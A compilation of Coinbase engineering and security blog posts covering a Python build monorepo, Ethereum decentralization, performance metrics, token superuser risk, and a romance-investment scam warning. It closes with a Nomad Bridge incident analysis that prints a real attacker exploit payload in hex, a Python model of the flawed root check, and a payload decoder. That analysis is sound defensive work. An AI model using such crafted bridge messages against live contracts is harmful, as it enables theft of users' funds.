Python is one of the most frequently used programming languages for data scientists, machine learning practitioners, and blockchain researchers at Coinbase. Over the past few years, we have witnessed a growing number of Python applications that aim to solve challenging problems in the cryptocurrency world: Airflow data pipelines, blockchain analytics tools, machine learning applications, and many others. Based on our internal data, the number of Python applications has almost doubled since Q3 2022; today there are approximately 1,500 data processing pipelines and services developed with Python, and the total number of builds is around 500 per week at the time of writing. We foresee even wider adoption as more Python-centric frameworks (such as Ray, Modin, and DASK) are adopted into our data ecosystem.

Choosing the right tool

Engineering success comes largely from choosing the right tools. Building a large-scale Python ecosystem to support our growing engineering requirements raised several challenges: providing a reliable build system, flexible dependency management, fast software releases, and consistent code quality checks. We addressed these challenges by integrating Pants, a build system developed by Toolchain Labs, into the Coinbase build infrastructure. We chose Pants as our Python build system for the following reasons:

  1. Pants is ergonomic and user-friendly.
  2. Pants understands many build-related commands, such as “test”, “lint”, “fmt”, “typecheck”, and “package”.
  3. Pants was designed with real-world Python use as a first-class use case, including handling third-party dependencies. In fact, parts of Pants itself are written in Python (with the rest written in Rust).
  4. Pants requires less metadata and BUILD file boilerplate than other tools, thanks to dependency inference, sensible defaults, and auto-generation of BUILD files. Bazel, by contrast, requires a large amount of handwritten BUILD boilerplate.
  5. Pants is easy to extend, with a powerful plugin API that uses idiomatic Python 3 async code, so that users can have a natural control flow in their plugins.
  6. Pants has true OSS governance, where any org can play an equal role.
  7. Pants has a gentle learning curve, with much less friction than other tools. The maintenance cost is moderate thanks to the one-click installation experience and simple configuration files.

Previous problems

Python is one of the most popular programming languages for machine learning and data science applications. However, prior to adopting the Python-first build system Pants, our internal investment in the Python ecosystem was low in comparison to that of Golang and Ruby — the primary choices for writing services and web applications at Coinbase.

According to the usage statistics of Coinbase’s monorepo, Python today accounts for only 4% of usage because of the lack of build system support. Before 2021, most Python projects lived in multiple repositories without a unified build infrastructure — leading to the following issues:

  1. Challenges with code sharing: The process for an engineer to update a shared library was complex. Changes made to the code had to be published to an internal PyPI server before being proven stable. A library upgraded to a new version without sufficient testing could break any consumer that used the library without a pinned version.
  2. Lack of streamlined release process: Code change often required complicated cross-repository updates and releases. There was no automatic workflow to carry out the integration and staging tests for the relevant changes. The lack of coherent observability and reliability imposed a tremendous engineering overhead.
  3. Inconsistent development experiences: Development experience varied a lot, as each repository had its own way of setting up virtual environments, checking code quality, building, and deploying.

Building PyNest for data organization

We decided to build PyNest — a new Python “monorepo” for the data organization at Coinbase. It is not our intention for PyNest to be used as a monorepo for the entire company; rather, the repository is intended for projects within the data organization, for the following reasons:

  1. Building a company-wide monorepo requires a team of elites. We do not have enough crew to reproduce the success stories of monorepos at Facebook, Twitter, and Google.
  2. Python is primarily used within the data org in the company. It is important to set the right scope so that we can focus on data priorities without being distracted by ad hoc requirements. The PyNest build infrastructure can be reused by other teams to expedite their Python repositories.
  3. It is desirable to consolidate mutually dependent projects (see the dependency graph for ML platform projects) into a single repository to prevent inadvertent cyclic dependencies.

Figure 1. Dependency graph for machine learning platform (MLP) projects.

  4. Although the monorepo promised a new world of productivity, it has proven not to be a long-term solution for Coinbase. The Golang monorepo is a cautionary lesson: after a year of usage, problems emerged such as a sprawling codebase, failed IDE integrations, slow CI/CD, and out-of-date dependencies.
  5. Open source projects should be kept in individual repositories.

The graph below shows the repository architecture at Coinbase, where the green blocks indicate the new Python ecosystem we have built. Inter-repository operability is achieved through serving layers, including the code artifacts and schema registry.

Figure 2. Repository architecture at Coinbase

PyNest repository structure

# third-party dependencies
├── 3rdparty
│   ├── dependency1
│   │   ├── BUILD
│   │   ├── requirements.txt
│   │   └── resolve1.lock # lockfile
│   │
│   └── dependency2
│       ├── BUILD
│       ├── requirements.txt
│       └── resolve2.lock
...
# shared libraries
├── lib
# top level project folders
├── project1 # project name
│    ├── src
│    │    └── python
│    │         ├── databricks
│    │         │    ├── BUILD
│    │         │    ├── OWNERS
│    │         │    ├── gateway.py
│    │         │    ...
│    │         └── notebook
│    │              ├── BUILD
│    │              ├── OWNERS
│    │              ├── etl_job.py
│    │              ...
│    └── test
│         └── python
│              ├── databricks
│              │    ├── BUILD
│              │    ├── gateway_test.py
│              │    ...
│              └── notebook
│                   ├── BUILD
│                   ├── etl_job_test.py
│                   ...
├── project2
...
# Docker files
├── dockerfiles
# tools for lint, formatting, etc.
├── tools
# Buildkite CI workflow
├── .buildkite
│    ├── pipeline.yml
│    └── hooks
# Pants library
├── pants
├── pants.toml
└── pants.ci.toml

Figure 3. PyNest repository structure

The following is a list of the major elements of the repository and their explanations.

1. 3rdparty

Third-party dependencies are placed under this folder. Pants parses the requirements.txt files and automatically generates a “python_requirement” target for each dependency. Multiple versions of the same dependency are supported by Pants’ multiple-lockfiles feature, which makes it possible for projects to have conflicts in either direct or transitive dependencies. Pants generates lockfiles to pin every dependency and ensure a reproducible build. More explanation of Pants’ multiple lockfiles will follow in the dependency management section of our next post.
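
As a sketch of how this wiring looks, following the multiple-resolves convention in the public Pants documentation (the names mirror the tree above, and the resolve must also be declared under [python.resolves] in pants.toml):

# 3rdparty/dependency1/BUILD
# Assumes pants.toml declares:
#   [python.resolves]
#   resolve1 = "3rdparty/dependency1/resolve1.lock"
python_requirements(
    name="dependency1",
    source="requirements.txt",
    resolve="resolve1",  # pin this set of requirements to its own lockfile
)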

2. Lib

Shared libraries accessible to all the projects live here. Projects within PyNest can directly import the source code; projects outside PyNest can access the libraries by pip-installing the wheel files from an internal PyPI server.

3. Project folders

Individual projects live in this folder. The folder path is formatted as “{project_name}/{src or test}/python/{namespace}”. The source root is configured as “src/python” or “test/python”, and the namespace underneath is used to isolate the modules.

4. Code owner files

Code owner files (OWNERS) are added to folders to define the individuals or teams responsible for the code in that folder tree. The CI workflow invokes a script to compile all the OWNERS files into a CODEOWNERS file under “.github/”. The code owner approval rule requires all pull requests to have at least one approval from the group of code owners before they can be merged.

5. Tools

The tools folder contains the configuration files for code quality tools such as flake8, black, isort, and mypy. These files are referenced by Pants to configure the linters.

6. Buildkite workflow

Coinbase uses Buildkite as the CI platform. The Buildkite workflow and the hook definitions are defined in this folder. The CI workflow defines steps such as:

  • Check whether dependency lockfiles need updating.
  • Execute lints and code quality tools.
  • Build source code and Docker images.
  • Run unit and integration tests.
  • Generate code coverage reports.

7. Dockerfiles

Dockerfiles are defined in this folder. The docker images are built by the CI workflow and deployed by Codeflow — an internal deployment platform at Coinbase.

8. Pants libraries

This folder contains the Pants script and the configuration files (pants.toml, pants.ci.toml).

This article describes how we build PyNest using the Pants build system. In our next blog post, we will explain dependency management and CI/CD.



Decentralization, privacy, and a credibly neutral Ethereum

Tl;dr: The following post recaps this episode of Coinbase’s Around The Block podcast, in which Viktor Bunin hosts Coinbase CEO Brian Armstrong and Ethereum co-founder Vitalik Buterin for a discussion of decentralization, privacy, and a credibly neutral Ethereum.

By Viktor Bunin, Senior Protocol Specialist at Coinbase Cloud

After 7 years of research and development, the Merge is just around the corner. A crowning achievement, the Merge will finally transition Ethereum from Proof-of-work (PoW) to Proof-of-stake (PoS).

I encourage everyone to listen to the whole episode, but I wanted to take this opportunity to pull out what I believe are the key messages to take away from the conversation between two industry giants.

  • The transition to PoS wasn’t immediately obvious. As Vitalik put it, an idea like this can be scary, like a pond filled with sharks; but once you figure out the sharks, you at least know what you’re going up against, which makes it possible to deal with the problem.
  • Scientists and engineers are equally needed. Incredible researchers, like Vitalik, do the tough work of pushing the envelope on what’s possible, but it’s up to the builders to then take the baton, commercialize the products, and bring the technology to millions of users.
  • Good times create centralized projects. Bull markets tilt the scale from principles to expediency until a bear market tilts them back. The reality is that principles aren’t just principles, they result in decisions that keep projects secure and mindsets that keep builders building.
  • Decentralization is vital low in the stack. If the foundational layer breaks or is corrupted, everything built on top of it breaks as well.
  • Ethereum is more robust and decentralized on PoS. Anyone can spin up an Ethereum validator anywhere in the world with much less capital and technical skills compared to mining. All you need is a computer with an internet connection.
  • Ethereum will continue decentralizing its infrastructure operations. Proposer-Builder Separation will take away a validator’s ability to express a preference over the contents of the blocks they create, making censorship at the block level impossible.
  • OFAC took its first action involving DeFi. The recent Tornado Cash action is the first time OFAC has sanctioned a technology (smart contract) and it has raised questions with many groups (CoinCenter, EFF, CCI, etc.) about whether this was an overstep of OFAC’s authority.
  • Coinbase prioritizes and supports decentralization for Ethereum’s base layer. As mentioned earlier, decentralization is vital low in the stack, and there’s nothing lower than Ethereum’s base layer. In the hypothetical scenario where Coinbase is forced to censor, we would rather wind down our staking operation to preserve the integrity of the overall network.
  • Privacy is solvable. We can solve swaths of the challenges with privacy through technological solutions that enable user privacy while minimizing privacy for criminals.
  • We need to build the future we want to see. You need to make “stuff!” It doesn’t just magically appear. Decentralized identity must be created, it won’t spawn into being just because crypto becomes successful.
  • Values and culture must be cultivated. Whether the community is centralized or decentralized, it’s crucial for leaders to set and encourage cultural alignment around a set of values. Without cultivation, undesirable characteristics may rise and cause community fragmentation.
  • Crypto is global. The world is moving towards a global mindset and crypto is already there. One way in which Coinbase is adopting this mindset is by supporting global apps like Coinbase Wallet.
  • There are still unsolved problems. The best currency, building the “freedom stack,” e-charter cities, VR, climate change, and so on must be decided upon and created.

There’s still a lot more to build and it’s important we continue working together to build the future of crypto, grow the entire ecosystem, and remain eternally optimistic and collaborative.



Performance Vitals: a unified scoring system to guide performance health and prioritization

Tl;dr: The following post details how we measure client performance across products and cross-functional teams at Coinbase.

By Leonardo Zizzamia, Senior Staff Software Engineer

A lot has changed since 2018 when the Coinbase web team consisted of only a few engineers. Back then, while working on making our product faster with a small group across a single platform, we could rely on pre-existing open source tools.

In 2022, Coinbase now has engineers working across multiple product offerings and four platforms: React Web, React Native, Server Side Rendering and Chrome Extension. Performance across all four platforms had never previously been standardized, so we needed to address several aspects: a lack of sufficient, complete data for some platforms, the loss of efficiency when performance opportunities could not be identified, and consistent prioritization across all teams.

Knowing this, we introduced the Performance Vitals: A high-level scoring system that is clear, trusted, and easy to understand. Summarizing the performance health of an application into a reliable and consistent score helps increase urgency and directs company attention and resources towards addressing each performance opportunity.

Extending Google Web Vitals

The Web developer community has the Core Web Vitals standard to help measure client performance, which we have adopted and use actively at Coinbase.

Vital metrics are differentiated by thresholds that categorize each performance measurement as either “good”, “needs improvement”, or “poor”.

Below is one example of where the threshold could lie for one of the Web Vitals, Time to First Byte.

To classify the overall performance of a client product, Coinbase follows best practices and uses the 85th percentile value of all measurements for that page or screen. In other words, if at least 85% of measurements on a site meet the “good” threshold, the site is classified as having “good” performance for that metric. This percentile is 10 points higher than the Google Web Vitals standard of 75, giving us extra headroom to catch and fix potential regressions.
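
The classification above reduces to simple arithmetic. Below is a minimal sketch, using web.dev’s published “good” TTFB threshold of 800 ms as the example threshold:

def good_score(samples_ms: list[float], good_threshold_ms: float) -> float:
    """Percent of measurements at or under the 'good' threshold."""
    good = sum(1 for s in samples_ms if s <= good_threshold_ms)
    return 100.0 * good / len(samples_ms)

# e.g. five TTFB samples against the 800 ms "good" threshold:
score = good_score([120.0, 450.0, 700.0, 950.0, 2100.0], 800.0)  # 60.0
is_good = score >= 85.0  # Coinbase's bar: at least 85% of samples must be "good"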

The primary tool we use to capture these metrics is the Perfume.js library, a wrapper around the Performance Observer API that helps us measure all Core Web Vitals. As we are the primary maintainer of this library, we used this opportunity to research and develop new solutions around web performance measurement and attribution.

Today we introduce an innovative, in-house metric we call Navigation Total Blocking Time (NTBT). NTBT measures the amount of time the application may be blocked from processing code during the 2-second window after a user navigates from page A to page B: it is the sum of the blocking time of all long tasks within that window.

The image below is an example of an NTBT performance mark in coinbase.com helping a client engineer track down the long task and improve responsiveness when navigating between pages.

Perfume.js is also helpful in that it lets us enrich all of the metrics with Navigator API information, to differentiate between low-end and high-end experiences.

After adopting and extending Web Vitals, the next step for us was to repurpose this knowledge throughout our stack.

Coinbase Performance Vitals

In addition to building web apps, we build React Native mobile apps and the services that provide their data. We re-used the Web Vitals best practices and created new metrics to serve React Native applications and our Backend services. Together, we call them “Performance Vitals”, and they give us a holistic view of the performance scores of all of our applications, from downstream (Browser & Apps) to upstream (Backend Services).

As seen in the chart below, the Performance Vitals are divided end-to-end, from downstream to upstream.

Creating React Native Vitals

When evaluating performance for React Native we developed the initial Vitals of App Render Complete and Navigation Total Blocking Time.

  • App Render Complete (ARC): Measures the amount of time it takes to get from starting the application to fully rendering the content to the user without loading indicators. The “good” threshold of 5s is based on official guidance from the Android community.
  • Navigation Total Blocking Time (NTBT): Measures the amount of time the application may be blocked from processing code during the 2s window after a user navigates from screen A to screen B.

For NTBT we used the existing knowledge around Total Blocking Time from Web Vitals to determine a threshold for mobile. Given that a good TBT on Web is 200ms and we anticipate mobile to take longer, we doubled the standard from Web to arrive at 400ms for mobile.

The following video shows how a product engineer can detect long tasks, measure total blocking time when navigating between pages, and view additional NTBT measurements.

This metric helps catch potential sluggishness in a user interface, usually caused by executing long tasks on the main thread, blocking rendering, or expending too much processor power on background processes.

Similar to the experience of Web, Coinbase built an in-house React Native Core Vitals library to measure this performance, with the goal of open sourcing our discovery back to the community in the coming quarters.

Creating Backend Vitals

As we did with Web and React Native Vitals, we extended the Vitals standard to backend services including GraphQL and Backend Services.

The two metrics we first created are:

  • GraphQL Response Time (GRT): Round trip time for the GraphQL service to serve a request.
  • Upstream Response Time (URT): Round trip time for the API Gateway to serve a backend service.

To determine a Good Score to represent backend latency, we considered several points:

  1. From a user’s perspective, the system response time feels immediate when it is less than 1s.
  2. We also have to take into account that the network cost could vary between 50ms-500ms, depending on which region a user is reaching our product from.
  3. Based on points 1 and 2, GraphQL latency should not exceed 500ms, meaning the upstream services must respond in under 300ms because GraphQL queries have to await the slowest endpoint.
  4. Therefore, we concluded that the threshold for a GRT Good score is 500ms, and URT Good score is 300ms.

For Backend Vitals we aim for at least 99 percent of measurements for each logged request to meet the “Good” threshold.

As we continue to improve our performance, we will revisit our Good scores annually, potentially even lowering them over time so we can further lower latency for our users.

The instrumentation for Backend Vitals is made up of three essential pieces. First, we use our in-house analytics library to define metadata like the product, platform, and pages. Then, we propagate this information into our APIs, and ultimately we co-locate the performance metrics with the Web or React Native metadata.

Performance Vitals discoverability and prioritization

Using the same metric scoring and attribution system across different specialties at Coinbase makes it easy to identify areas of opportunity and aligns both frontend and backend engineers in performance efforts.

All Performance Vitals are based on real-time data from our production applications and can be discovered by standardized filters, such as: product name, platform, page, is logged in, geo region, GraphQL operation, and backend service.

This level of accuracy becomes especially useful for Real Time Anomaly Detection. All teams are able to own the performance metrics for their product surface, giving them the ability to have automated monitors for performance changes and be alerted when regressions occur.

In case of a performance regression, we use the percentage of the regression to determine if it’s critical to open an incident and mitigate the issue as soon as possible, or create a bug that can be solved in the coming sprint.

Quarterly and annual planning

Performance Vitals are perfect for KR planning, as they produce a score from 0 to 100 and can be easily stored for over a year. A common language for all performance KRs also makes it easier to create shared goals for teams across the organization.

A few examples of how you can frame your KRs are:

  • [Year KR] Reach NTBT Good Score of 90%, up from 70% in the Coinbase Mobile App.
  • [Quarter KR] Improve LCP Good Score from 70% to 85% in the Coinbase Web.

Up Next

Performance Vitals come down to finding a common language, whether it’s standardizing filters, setting quarterly KRs, or unifying a scoring system. From a small team working on an API regression to large initiatives led by multiple organizations, speaking the same language helps all types of product prioritization.

In the future, we plan to open source some of our learnings and share more about measuring and driving impact for Critical User Journeys and how we use automation and internal processes to enable everyone at Coinbase to build performant products.



Security PSA: Protecting ERC-20 assets from malicious actors

Tl;dr: At Coinbase, our top priority is, and always will be, protecting you and your digital assets. That’s why we secure Coinbase with the latest industry-leading technology and work with the larger community to build a safer crypto ecosystem so that everyone is able to succeed.

In this blog post, we share how a contract with dangerous superuser roles is only as secure as the protections on those roles and discuss controls including multisig, a governance contract, or revoked privileges that asset issuers can implement to prevent a single actor from exercising privileges in a malicious way.

By The Coinbase Digital Asset & Protocol Security Team

At Coinbase, when considering assets for listing, we define a risky function as any function that can directly or indirectly impact user balances or transfer amounts. This can be as direct as a superuser being able to burn funds on anyone's behalf, or as indirect as the ability to upgrade the token, which could change the token and/or user balances. Since Coinbase custodies assets on behalf of users, Coinbase Security needs to be able to provide users with the peace of mind that their tokens are safe. Therefore, any risky functionality within an asset reduces its eligibility for listing on Coinbase.

That said, even a token with risky functionality can potentially be eligible for listing if it has sufficient protections in place. Common protections of this nature are multisigs, governance contracts, and revoked privileges.

How to Secure a Risky Function with Access Modifiers

When projects need to use functions like burn() or upgrade(), developers must consider appropriate access controls to prevent a single user from calling the risky function. Any individual who holds a role that can perform risky functions exposes the asset to insider threats. Additionally, even if that user is trustworthy, an attacker compromising their key is another route by which token holders can be harmed by centralized superuser privileges.

Superuser Risk with Access Modifiers

A contract with dangerous superuser roles is only as secure as the protections on those roles. When a privileged user has their key compromised, an attacker may abuse that superuser role to call risky functions. Below we've outlined a compromised token project that used an access modifier to restrict a risky function to a superuser role controlled by a single individual.

Although Tim and his team restricted access to the risky function, the role was controlled by a single key owned by Tim. When Tim's key was compromised and the attacker upgraded the contract, the attacker gained full control of the project.

To mitigate superuser risk on access-restricted functions, token project teams can place a multisig or governance contract behind the superuser role, or revoke the privilege entirely, to decentralize or remove access to the function. Teams can assign privileged roles to a multisig/governance contract or the null address (0x00…) to prevent scenarios like Tim's Downfall Token from occurring.
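
To illustrate the difference, below is a conceptual sketch in Python (the real contracts are written in Solidity, and all names here are hypothetical) showing how a 2-of-3 multisig, or a role revoked to the null address, blunts a single-key compromise of a risky function like upgrade():

NULL_ADDRESS = "0x" + "00" * 20  # assigning the role here disables the function

class Multisig:
    def __init__(self, owners, threshold):
        self.owners, self.threshold = set(owners), threshold

    def approves(self, signers):
        # enough distinct owners must sign before the call is allowed
        return len(self.owners & set(signers)) >= self.threshold

class Token:
    def __init__(self, upgrade_role):
        self.upgrade_role = upgrade_role  # guard on the risky function

    def upgrade(self, signers):
        if self.upgrade_role == NULL_ADDRESS:
            raise PermissionError("upgrade() permanently revoked")
        if not self.upgrade_role.approves(signers):
            raise PermissionError("insufficient approvals")
        return "upgraded"

token = Token(Multisig({"tim", "alice", "bob"}, threshold=2))
# An attacker holding only Tim's compromised key can no longer upgrade:
# token.upgrade({"tim"}) raises PermissionError("insufficient approvals")
print(token.upgrade({"tim", "alice"}))  # two of three owners: allowed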

Protecting ERC-20 Assets from Malicious Actors

To better understand mitigations to superuser risk, we’ve outlined three (3) scenarios where the design of the privileged access mapped to the superuser role helped protect the token project when the original superuser’s key was compromised.

Why it Matters

The increased security offered by cryptocurrency is a big reason why digital money was created. Unlike traditional currencies, cryptocurrencies such as Bitcoin and Ethereum are open-source, meaning anyone can inspect the blockchains they run on, assuring that every transaction is accurate.

To create a fair and open financial system, we’ve developed a deliberate approach for adding new assets to our platform. Every ERC-20 asset on Coinbase goes through an extensive security review process to assess the custodial risk of funds and ensure that risky functions are appropriately mitigated. This gives token holders, whether they hold their tokens at an exchange like Coinbase or in a self-custodied wallet, stronger assurance in ownership of their tokens.

At Coinbase, we believe that everyone deserves access to financial services that can help empower them to create a better life for themselves and their families. If the world economy ran on a common set of standards that could not be manipulated by any one actor, the world would be a more fair and free place, and human progress would accelerate.

If you’re interested in listing your token with Coinbase, visit the Coinbase Asset Hub.

We understand that trust is built on dependable security — which is why we make protecting your account & your digital assets our number one priority. Learn more here.



Security PSA: Sha Zhu Pan (Pig Butchering) Investment Scams

Tl;dr Coinbase has seen a concerning increase in fraudulent cryptocurrency investment platforms that are sourcing victims through connections on dating apps and social media. We are encouraging our users to be vigilant against this type of social engineering scam.

The Coinbase Security team has previously submitted the domains in this blog, in addition to several other related domains, to Google Safe Browsing for alerting users when browsing to these sites.

By Coinbase Global Investigations and Threat Intelligence

Coinbase works closely with law enforcement partners across the globe to protect our customers from an array of targeted cyber attacks. Recently, we have seen a noteworthy increase in reports of scams purporting to be foreign exchanges or crypto trading platforms, spread by scammers whom victims meet on dating apps. While investment scams and romance scams are not unique to the cryptocurrency ecosystem, the irreversible nature of cryptocurrency transactions can make these scams devastating. This scheme is particularly effective because it relies on a scammer building trust with their victim, sometimes over weeks or months.

The scam typically follows this chain of events:

  • Victims are contacted through social media, have matched with the scammer on a dating app, or have been contacted on instant messaging applications.
  • The scammer encourages the victim to migrate their conversation to an encrypted messaging service, such as WhatsApp or WeChat, sometimes communicating for weeks or months before mentioning an investment opportunity.
  • The scammer typically claims they have received great financial returns from a cryptocurrency trading or mining platform and convinces the victim to co-invest with them or offers to teach them how to trade successfully.
  • Victims are directed to visit a fraudulent website that often looks like a legitimate trading platform and coached into depositing funds.
  • Some victims even receive a small amount of funds that are claimed to be “returns” on their investment to entice them to invest even larger sums.
  • When the victim tries to withdraw funds from the site, they are often told they owe a tax payment or service fee before their funds will be released, in an effort to further extort them for money.

How we have been working to protect our users:

  • Teams across Coinbase work to identify and add addresses associated with scams to our products’ blocklists to aid in protecting our customers.
  • Security teams frequently conduct scans to identify clusterings of existing scam sites and collaborate with law enforcement to enforce takedowns. These teams have increased monitoring to identify new sites that have the potential to be similarly abused.
  • While it is impossible to predict all addresses associated with scams, we conduct blockchain analysis on known scam addresses to map out related wallets and we communicate with other exchanges to inform them when they may be receiving these scammed funds.
  • We routinely collaborate with law enforcement to share intel on emerging scams and support their investigations into bad actors.

The following steps can be taken to protect yourself:

  • Be skeptical of investment opportunities from people you meet through online forums or dating apps, even if you have been communicating for a while. If they claim to have an exclusive or urgent opportunity, this is a big red flag.
  • Don’t disclose your current financial status to people you’ve met online and don’t post any of your financial information on social media.
  • Independently research any trading platform you are considering sending money to, including using consumer protection websites.
  • Please report any scams including the URL and the receiving cryptocurrency address to security@coinbase.com.
  • If you become aware of a scam, please report it to the FBI’s Internet Crimes Complaint Center.
  • Report any scam websites to Google Safe Browsing.

Investment scam landing pages often look like the following:



Nomad Bridge incident analysis

Tl;dr: Building a better crypto ecosystem means building a better, more equitable future for us all. That’s why we are investing in the larger community to make sure anyone who wants to participate in the crypto economy can do so in a secure way. In this blog post, we share lessons about the nature of the vulnerability, exploitation methodology, as well as on-chain analysis of attacker behavior during the Nomad Bridge incident.

While the Nomad bridge compromise does not directly affect Coinbase, we strongly believe that attacks on any crypto business are bad for the industry as a whole and hope the information in the blog will help strengthen and inform similar projects about threats and techniques used by malicious actors.

By: Peter Kacherginsky, Threat Intelligence and Heidi Wilder, Special Investigations

On August 1, 2022, Nomad Bridge suffered the fourth largest DeFi hack, with more than $186M stolen in just a few hours. As we described in our recent blog post, from the $540M Ronin Bridge compromise in March to the $250M Wormhole bridge hack in February of 2022, it is not a coincidence that DeFi bridges constitute some of the most costly incidents in our industry.

What makes the Nomad Bridge compromise unique is the simplicity of the exploit and the sheer number of individuals taking advantage of it to empty all stored assets piece by piece.

Vulnerability Analysis

Nomad is a bridging protocol supporting Ethereum, Moonbeam, and other chains. Nomad’s bridging protocol is built using both on-chain and off-chain components. On-chain smart contracts are used to collect and distribute bridged funds while off-chain agents relay and verify messages between different blockchains. Each blockchain deploys a Replica contract which validates and stores messages in a Merkle tree structure. Messages can be validated by either providing proof with the proveAndProcess() call or for already verified messages they can be simply submitted with the process() call. Verified messages are forwarded to a Bridge handler (e.g. ERC20 Router) which can distribute bridged assets.

On April 21, 2022 Nomad deployed a Replica proxy contract to handle processing and validation of users’ claims of bridged assets. This proxy would allow Nomad to easily change implementation logic while retaining storage across upgrades. As part of the proxy deployment, Nomad set initial contract parameters defined in the snippet below:

Notice the highlighted confirmAt map assignment which sets an initial entry for the trusted _committedRoot to the value of 1. The variable _committedRoot is provided as an initialization parameter by Nomad’s contract deployer. Let’s see what it was set to during the initialization:

Interestingly, the initialization parameter _committedRoot was set to 0. As a result, the confirmAt map has held a value of 1 for the 0 entry from April to this day:

On June 21, 2022, Nomad performed a series of upgrades to its bridging infrastructure including the Replica implementation. One of the changes included updates to the message verification logic in the process() function:

The message verification flow now includes a call to the acceptableRoot() method, which in turn references the confirmAt map we mentioned above:

The vulnerability appears in a scenario when fraudulent messages, not present in the trusted messages[] map, are sent directly to the process() method. In this scenario messages[_messageHash] returns a default null value for non-existent entries so the acceptableRoot() method is called as follows:

In turn, the acceptableRoot() method will perform a lookup against confirmAt[] map with a null value as follows:

As we mentioned at the beginning of this section, the confirmAt[] map has a null entry defined, resulting in acceptableRoot() returning true and authorizing fraudulent messages.
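
Putting the pieces together, here is a minimal Python model of the acceptance logic described above (an illustrative sketch only; the actual contract is written in Solidity, and the names simply mirror the functions discussed):

NULL_ROOT = b"\x00" * 32

class Replica:
    def __init__(self, committed_root):
        # initialize() sets confirmAt[_committedRoot] = 1;
        # Nomad's deployer passed _committedRoot = 0
        self.confirm_at = {committed_root: 1}
        self.messages = {}  # message hash -> proven Merkle root

    def acceptable_root(self, root, now=2):
        # a root is acceptable once its confirmAt timestamp has passed
        confirm_at = self.confirm_at.get(root, 0)
        return confirm_at != 0 and now >= confirm_at

    def process(self, message_hash):
        # messages[] returns the null root for unproven messages, and the
        # null root is treated as confirmed because confirmAt[0x00] == 1
        root = self.messages.get(message_hash, NULL_ROOT)
        return self.acceptable_root(root)

replica = Replica(committed_root=NULL_ROOT)  # _committedRoot was set to 0
print(replica.process(b"\xde\xad" * 16))     # True: fraudulent message accepted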

Exploit Analysis

The exploit takes advantage of the above vulnerability by crafting a message which tricks the Nomad bridge into sending stored tokens without proper authorization. Below is a sample process() payload in a transaction submitted by 0xb5c5…590e:

The Replica message has the following structure:

The recipient-specific _messageBody contains transaction data to be processed by the _recipient. Nomad recipients accept several transaction and message types, but we will focus on the transfer type:

Decoding the above payload illustrates how 0xb5c55f76f90cc528b2609109ca14d8d84593590e was able to steal 100 WBTC by submitting a specially crafted payload to bypass Nomad’s message checks.

In order to better understand the root cause of the exploit we developed a PoC to demonstrate it draining the entire token’s balance on the bridge in just a few transactions:

While writing a PoC we found it curious that attackers chose to extract funds in smaller increments when they could have drained the whole amount in a single transaction. This is likely due to the attackers not crafting bridge messages from scratch, but instead replaying existing transactions with patched receiving addresses.

On-Chain Analysis

Over $186M in ERC-20 tokens were stolen from the Nomad Bridge between August 1, 2022 at 21:32 UTC and August 2, 2022 at 05:49 UTC. The highest volume of stolen tokens was in USDC, followed by WETH, WBTC, and CQT. Within the first hour of the exploit, only WBTC and WETH were stolen, followed by several other ERC-20s.

Source: Dune Dashboard

In analyzing the blockchain data, we see that there were various addresses piggybacking off of the original exploiters and using almost identical input data with modified recipient addresses in order to siphon off the same token for the same amount. Once the WBTC contract was mostly drained, the attackers then went on to drain the WETH contract, and so on.

Further analyzing the first attackers in block 15259101, we find that the initial two attacker addresses leveraged a helper contract to obfuscate the exact exploit. Unfortunately, within that same block, several indexes down, another exploiter address seems to have struggled interacting with the helper contract and decided to bypass it, publicly exposing the exploit input data in the process. Other addresses in the same and later blocks then followed suit and used almost identical payloads to conduct the exploit.

Following the initial exploitation, and due to the ease of triggering the exploit, hundreds of copycats joined a massive exploitation of a single contract. While analyzing the payloads of various later attackers, we found that not only were the same tokens and amounts reused, but funds were also consistently being "bridged" from Moonbeam, just like the original exploit.

The attack happened in three stages: vulnerability testing a day prior to the attack, the initial exploit targeting WBTC stored on the bridge, and the copycat stage involving hundreds of unique addresses. Let's dive into each of these, including the partial return of stolen assets.

Vulnerability Testing

Throughout July 31, 2022, bitliq[.]eth was observed triggering the vulnerability using small amounts of WBTC and other tokens. For example, on Jul-31-2022 11:19:39 AM UTC, the actor sent a transaction to the process() method on the Ethereum blockchain with the following payload:

0x617661780000000000000000000000005e5ea959686c73ed32c1bc71892f7f317d13a267000000390065746800000000000000000000000088a69b4e698a4b090df6cf5bd7b2d47325ad30a36176617800000000000000000000000050b7545627a5162f82a992c33b87adc75187b21803000000000000000000000000a8c83b1b30291a3a1a118058b5445cc83041cd9d000000000000000000000000000000000000000000000000000000000000f6088a36a47f8e81af64c44b079c42742190bbb402efb94e91c9515388af4c0669eb

The payload can be decoded as follows:

  • Originating chain: “avax”
  • Destination chain: “eth”
  • Recipient: a8c83b1b30291a3a1a118058b5445cc83041cd9d (bitliq[.]eth)
  • Token Address: 0x50b7545627a5162F82A992c33b87aDc75187B218 (WBTC.e on Avalanche)
  • Amount: 0.00062984 BTC

This corresponds to a 0.00062984 BTC transaction sent to the bridge on the Avalanche chain.
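
For illustration, the Python sketch below parses the payload using the field layout implied by the decode above (the offsets are our reconstruction from the decoded values, not Nomad's reference code):

PAYLOAD = "0x" + (
    "61766178"                                                          # origin domain ("avax")
    "0000000000000000000000005e5ea959686c73ed32c1bc71892f7f317d13a267"  # sender
    "00000039"                                                          # nonce (57)
    "00657468"                                                          # destination domain ("eth")
    "00000000000000000000000088a69b4e698a4b090df6cf5bd7b2d47325ad30a3"  # recipient router
    "61766178"                                                          # body: token domain
    "00000000000000000000000050b7545627a5162f82a992c33b87adc75187b218"  # body: token id (WBTC.e)
    "03"                                                                # body: action type (transfer)
    "000000000000000000000000a8c83b1b30291a3a1a118058b5445cc83041cd9d"  # body: transfer recipient
    "000000000000000000000000000000000000000000000000000000000000f608"  # body: amount
    "8a36a47f8e81af64c44b079c42742190bbb402efb94e91c9515388af4c0669eb"  # body: details hash
)

def ascii_domain(raw):
    # Nomad domain ids decode to ASCII, e.g. b"avax", b"\x00eth"
    return raw.lstrip(b"\x00").decode()

raw = bytes.fromhex(PAYLOAD[2:])
header, body = raw[:76], raw[76:]
decoded = {
    "origin": ascii_domain(header[0:4]),
    "destination": ascii_domain(header[40:44]),
    "token": "0x" + body[4:36][-20:].hex(),
    "recipient": "0x" + body[37:69][-20:].hex(),
    "amount": int.from_bytes(body[69:101], "big"),
}
print(decoded["origin"], "->", decoded["destination"])  # avax -> eth
print(decoded["amount"] / 10**8, "WBTC")                # 0.00062984 (8 decimals)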

The payload was sent using the process() method, as opposed to the more common proveAndProcess(), and was not present in the messages[] map prior to execution in block 15249928:

